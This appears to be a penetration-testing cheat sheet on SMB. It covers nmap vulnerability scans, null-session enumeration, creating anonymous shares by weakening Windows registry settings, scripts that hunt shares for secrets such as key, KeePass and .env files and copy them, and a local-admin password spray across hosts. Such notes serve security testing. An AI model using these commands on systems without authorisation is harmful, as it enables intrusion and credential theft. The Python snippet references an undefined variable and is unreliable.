# SMB Check for SMB vulnerablities with Nmap: ``` $ sudo nmap -sV --script-args=unsafe=1 --script smb-os-discovery 10.10.13.37 -p139,445 $ sudo nmap -n -Pn -sV --script 'smb-vuln*' 10.10.13.37 -p445 ``` Check if SMB Signing is enabled with CME: ``` $ cme smb smb.txt | grep -a 'signing:False' ``` ## Fingerprint * Enumerate SMB version for old versions of Samba (for security reasons modern clients will not initiate connection with legacy protocols in use): ``` $ sudo ngrep -i -d eth0 's.?a.?m.?b.?a.*[[:digit:]]' port 139 $ echo exit | smbclient -N -L 10.10.13.37 --option='client min protocol=LANMAN1' ``` ## Mounting Mount: ``` $ sudo mount -t cifs '//127.0.0.1/Users' /mnt/smb -v -o user=snovvcrash,[pass='Passw0rd!'] ``` Status: ``` $ mount -v | grep 'type cifs' $ df -k -F cifs ``` Unmount: ``` $ sudo umount /mnt/smb ``` ## SMB Share with Null Authentication * Create an SMB share allowing null authentication. ### Linux {% code title="/etc/samba/smb.conf" %} ``` [global] map to guest = bad user server role = standalone server usershare allow guests = yes smb ports = 445 [smb] comment = Samba path = /srv/smb guest ok = yes read only = no browsable = yes force user = nobody ``` {% endcode %} ``` $ sudo service smbd restart $ sudo chown -R nobody:root /srv/smb/ $ sudo chmod -R 777 /srv/smb/ ``` ### Windows * ``` PS > mkdir C:\share PS > icacls C:\share\ /T /grant Anonymous` logon:r PS > icacls C:\share\ /T /grant Everyone:r PS > New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone' PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f # this will overwrite existing NullSessionPipes PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f ``` ## Hunt for Shares & Content * * ### Toy Example Collect listing of files with size < 10 Mb: ``` PS > cd \\megacorp.local\share PS > Get-ChildItem -Recurse -File | ? { $_.Length -lt 10MB } | select -ExpandProperty FullName | Out-File share.txt ``` Filter only files of interest based on their extensions, print the stats as a Python dict: ``` $ dos2unix share.txt $ cat share.txt | grep -e '\.7z$' -e '\.bak$' -e '\.bash_history$' -e '\.bat$' -e '\.bz2$' -e '\.cfg$' -e '\.cmd$' -e '\.conf$' -e '\.csv$' -e '\.doc$' -e '\.docm$' -e '\.docx$' -e '\.env$' -e '\.gz$' -e '\.ini$' -e '\.json$' -e '\.kdbx$' -e '\.key$' -e '\.odp$' -e '\.ods$' -e '\.odt$' -e '\.old$' -e '\.ovpn$' -e '\.p12$' -e '\.pdf$' -e '\.pem$' -e '\.pfx$' -e '\.ppt$' -e '\.pptx$' -e '\.ps1$' -e '\.rar$' -e '\.rtf$' -e '\.sh$' -e '\.tar$' -e '\.txt$' -e '\.vbs$' -e '\.xls$' -e '\.xlsm$' -e '\.xlsx$' -e '\.xml$' -e '\.yaml$' -e '\.yml$' -e '\.zip$' -e '\.zsh_history$' \ | awk -F. '{print $NF}' \ | sort \ | uniq -c \ | awk 'BEGIN { d = "{" } { d = d sprintf("\x27.%s\x27: %s, ", $2, $1) } END { d = substr(d, 1, length(d)-2); print d "}" }' ``` Generate a list of wanted files (Python) and copy them locally preserving original directory structure (PS): {% tabs %} {% tab title="Gen List " %} {% code title="gen\_list.py" %} ```python #!/usr/bin/env python3 # gen_list.py share.txt > files.txt import sys from pathlib import Path from random import sample stats = { ... } with open(sys.argv[1]) as f: files = f.read().splitlines() for suffix, count in stats.items(): if count <= 1000: arr = [line for line in office if Path(line).suffix == suffix] else: arr = [line for line in office if Path(line).suffix == suffix] arr = sample(arr, 1000) for a in arr: print(a) ``` {% endcode %} {% endtab %} {% tab title="Get Files" %} {% code title="get\_files.ps1" %} ```powershell $sourceBase = "\\megacorp.local\share" $destinationBase = "C:\Share" $fileList = Get-Content "C:\Share\files.txt" -Encoding UTF8 foreach ($file in $fileList) { $relativePath = $file.Substring($sourceBase.Length) $destFile = Join-Path $destinationBase $relativePath $destDir = Split-Path $destFile if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null } Copy-Item -Path $file -Destination $destFile -Force } ``` {% endcode %} {% endtab %} {% endtabs %} ### Tools * * * * * ## Tools ### rpcclient Check for null authentication: ``` $ rpcclient -N -L 127.0.0.1 ``` With user creds: ``` $ rpcclient -U 'snovvcrash%Passw0rd!' 127.0.0.1 ``` Local users info: ``` $ queryuser $ queryaliasmem builtin 0x220 # local admins $ queryaliasmem builtin 0x22B # remote desktop users ``` ### smbclient(.py) Check for null authentication: ``` $ smbclient -N -L 127.0.0.1 $ smbclient -N '\\127.0.0.1\Data' ``` With user creds: ``` $ smbclient -U snovvcrash '\\127.0.0.1\Users' 'Passw0rd!' ``` Get all files recursively: ``` smb: \> recurse ON smb: \> prompt OFF smb: \> mget * ``` Local admin spray: ``` $ cat use_c.cmd use c$ ls Windows $ for srv in `cat 445.tcp`; do proxychains4 -q smbclient.py Administrator:'Passw0rd!'@$srv -inputfile use_c.cmd |& grep Windows && echo $i; done ``` ### smbmap ``` $ smbmap -H 127.0.0.1 $ smbmap -H 127.0.0.1 -u anonymous $ smbmap -H 127.0.0.1 -u '' -p '' $ smbmap -H 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -R ShareName $ smbmap -H 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -R ShareName -A . ```